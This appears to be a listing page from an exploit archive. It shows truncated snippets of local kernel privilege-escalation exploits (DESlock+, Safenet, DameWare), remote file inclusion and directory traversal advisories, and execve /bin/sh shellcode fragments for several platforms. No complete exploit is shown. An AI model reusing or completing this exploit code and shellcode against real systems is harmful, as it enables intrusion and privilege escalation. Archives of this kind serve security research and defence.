DESlock+ 3.2.6 - DLMFDISK.sys Local kernel Ring0 SYSTEM

DESlock+ 3.2.6 - DLMFDISK.sys Local kernel Ring0 SYSTEM / deslock-pown-v2.c Copyright c 2008 by DESlock+ include include include define DLKFDISKIOCTL 0x80002024 define DLKFDISKRIOCTL 0x80002010 define DLKFDISKSLOT 0x00000C5A define DLKFDISKOFFSET 0x0D define DLKFDISKDISKMAX 0x1A static unsigned...

DESlock+ 3.2.6 - Local Kernel Ring0 link list zero SYSTEM

DESlock+ 3.2.6 - Local Kernel Ring0 link list zero SYSTEM / deslock-list-zero-v2.c Copyright c 2008 by DESlock+ include include include define DLMFENCIOCTL 0x0FA4204C define DLMFENCFLAG 0xC001D00D define DLKFDISKRIOCTL 0x80002008 define DLKFDISKSLOT 0x00000C5C define ARGSIZEa a/sizeof void static...

Safenet IPSecDrv.sys <= 10.4.0.12 Local kernel ring0 SYSTEM Exploit

Exploit for unknown platform in category local exploits =================================================================== Safenet IPSecDrv.sys Safenet IPSecDrv.sys include include include define IPSECDRVIOCTL 0x80002064 define ARGSIZEa a/sizeof void static unsigned char win32fixup = "\x...

anp-multi.txt

Discovered by hack2prison and navaro - VNBRAIN.NET member Vendor: Alstrasoft http://site/path/admin/backupstart.php http://site/path/admin/admin/dump/backup-dd-mm-yyyy.sql http://site/path/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql...

Web News 1.1 - &#039;news.php?config[root_ordner]&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks...

@cid Stats 2.3 - Install.php3 Remote File Inclusion

@cid Stats 2.3 - Install.php3 Remote File Inclusion source: https://www.securityfocus.com/bid/20925/info The '@cid stats' program is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise...

sco/x86 execve("/bin/sh", ..., NULL); 43 bytes

Exploit for sco/x86 platform in category shellcode ============================================== sco/x86 execve"/bin/sh", ..., NULL; 43 bytes ============================================== / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve"/bin/sh", ..., NULL; / inclu...

Active WebCam Webserver <= 5.5 Multiple Vulnerabilities (DoS, Path Disc)

The version of PY Software's Active WebCam web server running on the remote host is affected by multiple vulnerabilities: o Denial of Service Vulnerabilities. A request for a file on floppy drive may result in a dialog prompt, causing the service to cease until it is acknowledged by an...

Winace UnAce 1.x - ACE Archive Directory Traversal

Winace UnAce 1.x - ACE Archive Directory Traversal source: https://www.securityfocus.com/bid/12628/info A remotely exploitable client-side directory-traversal vulnerability affects Winace unace. The application fails to properly sanitize file and directory names contained within malicious ACE...

[SA13443] OpenBSD isakmpd Denial of Service Vulnerability

TITLE: OpenBSD isakmpd Denial of Service Vulnerability SECUNIA ADVISORY ID: SA13443 VERIFY ADVISORY: http://secunia.com/advisories/13443/ CRITICAL: Not critical IMPACT: DoS WHERE: Local system OPERATING SYSTEM: OpenBSD 3.x http://secunia.com/product/100/ DESCRIPTION: A vulnerability has been...

Kerio Personal Firewall 2.1.x4.x - Local Denial of Service

Kerio Personal Firewall 2.1.x4.x - Local Denial of Service source: https://www.securityfocus.com/bid/11859/info It is reported that the Kerio Personal Firewall KPF driver does not sufficiently sanitize API parameters that are received from API's that are hooked by KPF. When the KPF API hook handl...

linux/x86 execve /bin/sh alphanumeric 392 bytes

linux/x86 execve /bin/sh alphanumeric 392 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc = // nops here .. "LLLLXPY3E01E01u03u0fXh8eshXf5VJPfhbifhDefXf5AJfPDTYhKATYX5KATY"...

os-x/PPC setuid0 + execve /bin/sh 88 bytes

os-x/PPC setuid0 + execve /bin/sh 88 bytes. Shellcode exploit for osxppc platform / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does setuid0; execve/bin/sh; exit0; See ASM below. 88 Bytes. / char shellcode = "\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7d\x68\x02\xa6\x3b\xeb\x01\x70"...

freebsd/x86 - kldload /tmp/o.o 74 bytes

freebsd/x86 kldload /tmp/o.o 74 bytes. Shellcode exploit for freebsdx86 platform / The kldload shellcode setuid0 loads /tmp/o.o kernel module Size 74 bytes OS FreeBSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor eax,eax mov al,0x17 push eax in...

Mac OS X < 10.3.4 Multiple Vulnerabilities

The remote host is running a version of Mac OS X that is older than 10.3.4. Such versions contain several flaws that may allow an attacker to execute arbitrary commands on the remote system with root privileges. C Tenable Network Security, Inc. include"compat.inc"; ifdescription scriptid12257;...

KAME Racoon - &#039;Initial Contact&#039; SA Deletion

// source: https://www.securityfocus.com/bid/9417/info It has been reported that it may be possible for attackers to remotely delete security associations SAs in hosts running the KAME IKE daemon Racoon. / Sun Microsystems Solaris sysinfo Kernel Memory Disclosure exploit...

Microsoft Internet Explorer 56 - Object Type Validation

Microsoft Internet Explorer 56 - Object Type Validation source: https://www.securityfocus.com/bid/8456/info The problem occurs when Internet Explorer receives a response from the server when a web page containing an object tag is parsed. Successful exploitation of this vulnerability could allow a...

[CLA-2003:723] Conectiva Security Announcement - openslp

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- CONECTIVA LINUX SECURITY ANNOUNCEMENT - -------------------------------------------------------------------------- PACKAGE : openslp SUMMARY : Temporary file creation...

DameWare Mini Remote Control Server - System

DameWare Mini Remote Control Server - System / DameWare Mini Remote Control Server Local SYSTEM Exploit Vulnerable Versions Prior to 3.71.0.0 by [email protected] This code is based on shards.cpp by xenophile / define WIN32LEANANDMEAN include include pragma warningdisable: 4305 pragma...

DameWare Mini Remote Control Server SYSTEM Exploit

Exploit for unknown platform in category local exploits ================================================== DameWare Mini Remote Control Server SYSTEM Exploit ================================================== / DameWare Mini Remote Control Server Local SYSTEM Exploit Vulnerable Versions Prior to...